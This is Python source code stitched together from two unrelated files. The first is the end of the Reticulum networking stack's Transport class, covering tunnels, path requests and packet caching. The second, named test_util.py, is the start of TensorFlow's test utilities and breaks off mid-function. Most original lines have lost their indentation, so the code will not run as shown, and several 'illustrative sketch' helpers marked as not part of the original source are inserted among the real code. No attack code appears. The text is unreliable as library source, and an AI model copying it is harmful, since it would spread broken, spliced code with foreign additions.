RNS.log("Proof received on correct interface, transporting it via "+str(reverse_entry[0]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
reverse_entry[0].processOutgoing(new_raw)
else:
RNS.log("Proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
for receipt in Transport.receipts:
receipt_validated = False
if proof_hash != None:
# Only test validation if hash matches
if receipt.hash == proof_hash:
receipt_validated = receipt.validate_proof_packet(packet)
else:
# TODO: This looks like it should actually
# be rewritten when implicit proofs are added.
# In case of an implicit proof, we have
# to check every single outstanding receipt
receipt_validated = receipt.validate_proof_packet(packet)
if receipt_validated:
if receipt in Transport.receipts:
Transport.receipts.remove(receipt)
Transport.jobs_locked = False
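    # Illustrative sketch (not part of the original source): how the announce
    # handling in inbound() above decides whether an announce is newer than an
    # already known path. Bytes 5..10 of the announce's random blob are read as
    # a big-endian emission timestamp and compared to the highest timestamp in
    # the blobs already stored for that destination. The blob layout mirrors
    # the slicing used above.
    def _example_is_newer_announce(random_blob, known_random_blobs):
        announce_emitted = int.from_bytes(random_blob[5:10], "big")
        latest_known = 0
        for known_blob in known_random_blobs:
            latest_known = max(latest_known, int.from_bytes(known_blob[5:10], "big"))
        # A replayed blob is never accepted; otherwise the announce must have
        # been emitted more recently than anything already on record.
        return (random_blob not in known_random_blobs) and announce_emitted > latest_known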
@staticmethod
def synthesize_tunnel(interface):
interface_hash = interface.get_hash()
public_key = RNS.Transport.identity.get_public_key()
random_hash = RNS.Identity.get_random_hash()
tunnel_id_data = public_key+interface_hash
tunnel_id = RNS.Identity.full_hash(tunnel_id_data)
signed_data = tunnel_id_data+random_hash
signature = Transport.identity.sign(signed_data)
data = signed_data+signature
tnl_snth_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "tunnel", "synthesize")
packet = RNS.Packet(tnl_snth_dst, data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1, attached_interface = interface)
packet.send()
interface.wants_tunnel = False
@staticmethod
def tunnel_synthesize_handler(data, packet):
try:
expected_length = RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8+RNS.Identity.SIGLENGTH//8
if len(data) == expected_length:
public_key = data[:RNS.Identity.KEYSIZE//8]
interface_hash = data[RNS.Identity.KEYSIZE//8:RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8]
tunnel_id_data = public_key+interface_hash
tunnel_id = RNS.Identity.full_hash(tunnel_id_data)
random_hash = data[RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8:RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8]
signature = data[RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8:expected_length]
signed_data = tunnel_id_data+random_hash
remote_transport_identity = RNS.Identity(create_keys=False)
remote_transport_identity.load_public_key(public_key)
if remote_transport_identity.validate(signature, signed_data):
Transport.handle_tunnel(tunnel_id, packet.receiving_interface)
except Exception as e:
RNS.log("An error occurred while validating tunnel establishment packet.", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
@staticmethod
def handle_tunnel(tunnel_id, interface):
expires = time.time() + Transport.DESTINATION_TIMEOUT
if not tunnel_id in Transport.tunnels:
RNS.log("Tunnel endpoint "+RNS.prettyhexrep(tunnel_id)+" established.", RNS.LOG_DEBUG)
paths = {}
tunnel_entry = [tunnel_id, interface, paths, expires]
interface.tunnel_id = tunnel_id
Transport.tunnels[tunnel_id] = tunnel_entry
else:
RNS.log("Tunnel endpoint "+RNS.prettyhexrep(tunnel_id)+" reappeared. Restoring paths...", RNS.LOG_DEBUG)
tunnel_entry = Transport.tunnels[tunnel_id]
tunnel_entry[1] = interface
tunnel_entry[3] = expires
interface.tunnel_id = tunnel_id
paths = tunnel_entry[2]
deprecated_paths = []
for destination_hash, path_entry in paths.items():
received_from = path_entry[1]
announce_hops = path_entry[2]
expires = path_entry[3]
random_blobs = path_entry[4]
receiving_interface = interface
packet = path_entry[6]
new_entry = [time.time(), received_from, announce_hops, expires, random_blobs, receiving_interface, packet]
should_add = False
if destination_hash in Transport.destination_table:
old_entry = Transport.destination_table[destination_hash]
old_hops = old_entry[2]
old_expires = old_entry[3]
if announce_hops <= old_hops or time.time() > old_expires:
should_add = True
else:
RNS.log("Did not restore path to "+RNS.prettyhexrep(packet.destination_hash)+" because a newer path with fewer hops exist", RNS.LOG_DEBUG)
else:
if time.time() < expires:
should_add = True
else:
RNS.log("Did not restore path to "+RNS.prettyhexrep(packet.destination_hash)+" because it has expired", RNS.LOG_DEBUG)
if should_add:
Transport.destination_table[destination_hash] = new_entry
RNS.log("Restored path to "+RNS.prettyhexrep(packet.destination_hash)+" is now "+str(announce_hops)+" hops away via "+RNS.prettyhexrep(received_from)+" on "+str(receiving_interface), RNS.LOG_DEBUG)
else:
deprecated_paths.append(destination_hash)
for deprecated_path in deprecated_paths:
RNS.log("Removing path to "+RNS.prettyhexrep(deprecated_path)+" from tunnel "+RNS.prettyhexrep(tunnel_id), RNS.LOG_DEBUG)
paths.pop(deprecated_path)
@staticmethod
def register_destination(destination):
destination.MTU = RNS.Reticulum.MTU
if destination.direction == RNS.Destination.IN:
for registered_destination in Transport.destinations:
if destination.hash == registered_destination.hash:
raise KeyError("Attempt to register an already registered destination.")
Transport.destinations.append(destination)
if Transport.owner.is_connected_to_shared_instance:
if destination.type == RNS.Destination.SINGLE:
destination.announce(path_response=True)
@staticmethod
def deregister_destination(destination):
if destination in Transport.destinations:
Transport.destinations.remove(destination)
@staticmethod
def register_link(link):
RNS.log("Registering link "+str(link), RNS.LOG_DEBUG)
if link.initiator:
Transport.pending_links.append(link)
else:
Transport.active_links.append(link)
@staticmethod
def activate_link(link):
RNS.log("Activating link "+str(link), RNS.LOG_DEBUG)
if link in Transport.pending_links:
Transport.pending_links.remove(link)
Transport.active_links.append(link)
link.status = RNS.Link.ACTIVE
else:
RNS.log("Attempted to activate a link that was not in the pending table", RNS.LOG_ERROR)
@staticmethod
def register_announce_handler(handler):
"""
Registers an announce handler.
:param handler: Must be an object with an *aspect_filter* attribute and a *received_announce(destination_hash, announced_identity, app_data)* callable. See the :ref:`Announce Example<example-announce>` for more info.
"""
if hasattr(handler, "received_announce") and callable(handler.received_announce):
if hasattr(handler, "aspect_filter"):
Transport.announce_handlers.append(handler)
@staticmethod
def deregister_announce_handler(handler):
"""
Deregisters an announce handler.
:param handler: The announce handler to be deregistered.
"""
while handler in Transport.announce_handlers:
Transport.announce_handlers.remove(handler)
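    # Illustrative sketch (not part of the original source): a minimal announce
    # handler satisfying the interface required by register_announce_handler
    # above, i.e. an aspect_filter attribute and a received_announce callable.
    # The aspect string used for the filter is made up; set it to None to
    # receive announces for all destinations.
    class _ExampleAnnounceHandler:
        def __init__(self):
            self.aspect_filter = "example_utilities.announcesample"
        def received_announce(self, destination_hash, announced_identity, app_data):
            RNS.log("Received an announce from "+RNS.prettyhexrep(destination_hash), RNS.LOG_INFO)
    # Hypothetical usage: Transport.register_announce_handler(_ExampleAnnounceHandler())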
@staticmethod
def find_interface_from_hash(interface_hash):
for interface in Transport.interfaces:
if interface.get_hash() == interface_hash:
return interface
return None
@staticmethod
def should_cache(packet):
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
return False
# When caching packets to storage, they are written
# exactly as they arrived over their interface. This
# means that they have not had their hop count
# increased yet! Take note of this when reading from
# the packet cache.
@staticmethod
def cache(packet, force_cache=False):
if RNS.Transport.should_cache(packet) or force_cache:
try:
packet_hash = RNS.hexrep(packet.get_hash(), delimit=False)
interface_reference = None
if packet.receiving_interface != None:
interface_reference = str(packet.receiving_interface)
file = open(RNS.Reticulum.cachepath+"/"+packet_hash, "wb")
file.write(umsgpack.packb([packet.raw, interface_reference]))
file.close()
except Exception as e:
RNS.log("Error writing packet to cache", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e))
@staticmethod
def get_cached_packet(packet_hash):
try:
packet_hash = RNS.hexrep(packet_hash, delimit=False)
path = RNS.Reticulum.cachepath+"/"+packet_hash
if os.path.isfile(path):
file = open(path, "rb")
cached_data = umsgpack.unpackb(file.read())
file.close()
packet = RNS.Packet(None, cached_data[0])
interface_reference = cached_data[1]
for interface in Transport.interfaces:
if str(interface) == interface_reference:
packet.receiving_interface = interface
return packet
else:
return None
except Exception as e:
RNS.log("Exception occurred while getting cached packet.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
@staticmethod
def cache_request_packet(packet):
        if len(packet.data) == RNS.Identity.HASHLENGTH//8:
packet = Transport.get_cached_packet(packet.data)
if packet != None:
                # If the packet was retrieved from the local
                # cache, replay it to the Transport instance,
                # so that it can be directed towards its original
                # destination.
Transport.inbound(packet.raw, packet.receiving_interface)
return True
else:
return False
else:
return False
@staticmethod
def cache_request(packet_hash, destination):
cached_packet = Transport.get_cached_packet(packet_hash)
if cached_packet:
# The packet was found in the local cache,
# replay it to the Transport instance.
            Transport.inbound(cached_packet.raw, cached_packet.receiving_interface)
else:
# The packet is not in the local cache,
# query the network.
RNS.Packet(destination, packet_hash, context = RNS.Packet.CACHE_REQUEST).send()
@staticmethod
def has_path(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: *True* if a path to the destination is known, otherwise *False*.
"""
if destination_hash in Transport.destination_table:
return True
else:
return False
@staticmethod
def hops_to(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The number of hops to the specified destination, or ``RNS.Transport.PATHFINDER_M`` if the number of hops is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][2]
else:
return Transport.PATHFINDER_M
@staticmethod
def next_hop(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The destination hash as *bytes* for the next hop to the specified destination, or *None* if the next hop is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][1]
else:
return None
@staticmethod
def next_hop_interface(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The interface for the next hop to the specified destination, or *None* if the interface is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][5]
else:
return None
@staticmethod
def request_path(destination_hash):
"""
Requests a path to the destination from the network. If
another reachable peer on the network knows a path, it
will announce it.
:param destination_hash: A destination hash as *bytes*.
"""
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1)
packet.send()
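    # Illustrative sketch (not part of the original source): typical use of the
    # path API above from application code. The timeout handling is made up; a
    # real application would normally register an announce handler or poll
    # has_path from its own event loop instead of blocking like this.
    def _example_resolve_path(destination_hash, timeout=30.0):
        if not Transport.has_path(destination_hash):
            Transport.request_path(destination_hash)
            waited = 0.0
            while not Transport.has_path(destination_hash) and waited < timeout:
                sleep(0.1)
                waited += 0.1
        if Transport.has_path(destination_hash):
            return Transport.hops_to(destination_hash), Transport.next_hop_interface(destination_hash)
        return None, None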
@staticmethod
def request_path_on_interface(destination_hash, interface):
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1, attached_interface = interface)
packet.send()
@staticmethod
def path_request_handler(data, packet):
try:
if len(data) >= RNS.Identity.TRUNCATED_HASHLENGTH//8:
Transport.path_request(
data[:RNS.Identity.TRUNCATED_HASHLENGTH//8],
Transport.from_local_client(packet),
packet.receiving_interface
)
except Exception as e:
RNS.log("Error while handling path request. The contained exception was: "+str(e), RNS.LOG_ERROR)
@staticmethod
def path_request(destination_hash, is_from_local_client, attached_interface):
RNS.log("Path request for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
local_destination = next((d for d in Transport.destinations if d.hash == destination_hash), None)
if local_destination != None:
RNS.log("Destination is local to this system, announcing", RNS.LOG_DEBUG)
local_destination.announce(path_response=True)
elif (RNS.Reticulum.transport_enabled() or is_from_local_client or len(Transport.local_client_interfaces) > 0) and destination_hash in Transport.destination_table:
RNS.log("Path found, inserting announce for transmission", RNS.LOG_DEBUG)
packet = Transport.destination_table[destination_hash][6]
received_from = Transport.destination_table[destination_hash][5]
now = time.time()
retries = Transport.PATHFINDER_R
local_rebroadcasts = 0
block_rebroadcasts = True
announce_hops = packet.hops
if is_from_local_client:
retransmit_timeout = now
else:
# TODO: Look at this timing
retransmit_timeout = now + Transport.PATH_REQUEST_GRACE # + (RNS.rand() * Transport.PATHFINDER_RW)
            # This handles an edge case where a peer sends a path
            # request for a destination just after an announce for
            # said destination has arrived, but before it has been
            # rebroadcast locally. In such a case the actual announce
            # is temporarily held, and then reinserted when the path
            # request has been served to the peer.
if packet.destination_hash in Transport.announce_table:
held_entry = Transport.announce_table[packet.destination_hash]
Transport.held_announces[packet.destination_hash] = held_entry
Transport.announce_table[packet.destination_hash] = [now, retransmit_timeout, retries, received_from, announce_hops, packet, local_rebroadcasts, block_rebroadcasts, attached_interface]
elif is_from_local_client:
# Forward path request on all interfaces
# except the local client
for interface in Transport.interfaces:
if not interface == attached_interface:
Transport.request_path_on_interface(destination_hash, interface)
elif not is_from_local_client and len(Transport.local_client_interfaces) > 0:
# Forward the path request on all local
# client interfaces
for interface in Transport.local_client_interfaces:
Transport.request_path_on_interface(destination_hash, interface)
else:
RNS.log("No known path to requested destination, ignoring request", RNS.LOG_DEBUG)
@staticmethod
def from_local_client(packet):
if hasattr(packet.receiving_interface, "parent_interface"):
return Transport.is_local_client_interface(packet.receiving_interface)
else:
return False
@staticmethod
def is_local_client_interface(interface):
if hasattr(interface, "parent_interface"):
if hasattr(interface.parent_interface, "is_local_shared_instance"):
return True
else:
return False
else:
return False
@staticmethod
def interface_to_shared_instance(interface):
if hasattr(interface, "is_connected_to_shared_instance"):
return True
else:
return False
@staticmethod
def detach_interfaces():
for interface in Transport.interfaces:
interface.detach()
for interface in Transport.local_client_interfaces:
interface.detach()
@staticmethod
def exit_handler():
try:
if not RNS.Reticulum.transport_enabled():
Transport.packet_hashlist = []
else:
RNS.log("Saving packet hashlist to storage...", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
file = open(packet_hashlist_path, "wb")
file.write(umsgpack.packb(Transport.packet_hashlist))
file.close()
except Exception as e:
RNS.log("Could not save packet hashlist to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
if not Transport.owner.is_connected_to_shared_instance:
RNS.log("Saving path table to storage...", RNS.LOG_VERBOSE)
try:
serialised_destinations = []
for destination_hash in Transport.destination_table:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
interface_hash = de[5].get_hash()
# Only store destination table entry if the associated
# interface is still active
interface = Transport.find_interface_from_hash(interface_hash)
if interface != None:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
timestamp = de[0]
received_from = de[1]
hops = de[2]
expires = de[3]
random_blobs = de[4]
packet_hash = de[6].get_hash()
serialised_entry = [
destination_hash,
timestamp,
received_from,
hops,
expires,
random_blobs,
interface_hash,
packet_hash
]
serialised_destinations.append(serialised_entry)
Transport.cache(de[6], force_cache=True)
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
file = open(destination_table_path, "wb")
file.write(umsgpack.packb(serialised_destinations))
file.close()
RNS.log("Done saving "+str(len(serialised_destinations))+" path table entries to storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not save path table to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("Saving tunnel table to storage...", RNS.LOG_VERBOSE)
try:
serialised_tunnels = []
for tunnel_id in Transport.tunnels:
te = Transport.tunnels[tunnel_id]
interface = te[1]
tunnel_paths = te[2]
expires = te[3]
if interface != None:
interface_hash = interface.get_hash()
else:
interface_hash = None
serialised_paths = []
for destination_hash in tunnel_paths:
de = tunnel_paths[destination_hash]
timestamp = de[0]
received_from = de[1]
hops = de[2]
expires = de[3]
random_blobs = de[4]
packet_hash = de[6].get_hash()
serialised_entry = [
destination_hash,
timestamp,
received_from,
hops,
expires,
random_blobs,
interface_hash,
packet_hash
]
serialised_paths.append(serialised_entry)
Transport.cache(de[6], force_cache=True)
serialised_tunnel = [tunnel_id, interface_hash, serialised_paths, expires]
serialised_tunnels.append(serialised_tunnel)
tunnels_path = RNS.Reticulum.storagepath+"/tunnels"
file = open(tunnels_path, "wb")
file.write(umsgpack.packb(serialised_tunnels))
file.close()
RNS.log("Done saving "+str(len(serialised_tunnels))+" tunnel table entries to storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not save tunnel table to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
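# Illustrative sketch (not part of the original source): typical use of
# assert_ops_in_graph above. The graph construction and node names here are
# hypothetical; the mapping goes from node name to expected op type.
def _example_assert_ops_in_graph():
  g = ops.Graph()
  with g.as_default():
    a = array_ops.placeholder(dtypes.float32, name="a")
    array_ops.identity(a, name="b")
  # Raises ValueError if either node is missing or has a different op type.
  return assert_ops_in_graph({"a": "Placeholder", "b": "Identity"}, g)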
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
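# Illustrative sketch (not part of the original source): typical use of
# assert_equal_graph_def above, comparing the GraphDefs of two independently
# constructed graphs. Node names must match for the comparison to succeed.
def _example_assert_equal_graph_def():
  def build():
    g = ops.Graph()
    with g.as_default():
      array_ops.placeholder(dtypes.float32, name="x")
    return g.as_graph_def()
  # Raises AssertionError if the GraphDefs differ (ignoring versions and the
  # ordering of nodes, attrs and control inputs).
  assert_equal_graph_def(build(), build())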
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
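# Illustrative sketch (not part of the original source): NHWCToNCHW above
# accepts either a tensor or a plain shape list and simply permutes the axes.
# The sample shapes are made up.
def _example_nhwc_to_nchw_shapes():
  # 4-D: batch, height, width, channels -> batch, channels, height, width
  assert NHWCToNCHW([8, 32, 32, 3]) == [8, 3, 32, 32]
  # 5-D: batch, depth, height, width, channels -> batch, channels, d, h, w
  assert NHWCToNCHW([8, 16, 32, 32, 3]) == [8, 3, 16, 32, 32]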
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
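# Illustrative sketch (not part of the original module): this is the inverse of the
# shape transform above, folding the trailing group-of-four dimension back into the
# channel dimension for the same hypothetical shape.
def _example_nchw_vect_c_to_nhwc_shape():
  assert NCHW_VECT_CToNHWC([2, 2, 5, 5, 4]) == [2, 5, 5, 8]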
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
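# Illustrative sketch (not part of the original module): skip_if accepts either a
# boolean or a zero-argument callable. The condition below is hypothetical and only
# illustrates the decorator's shape.
def _example_skip_if_usage():
  @skip_if(lambda: not IsGoogleCudaEnabled())
  def _cuda_only_check():
    pass
  _cuda_only_check()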
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
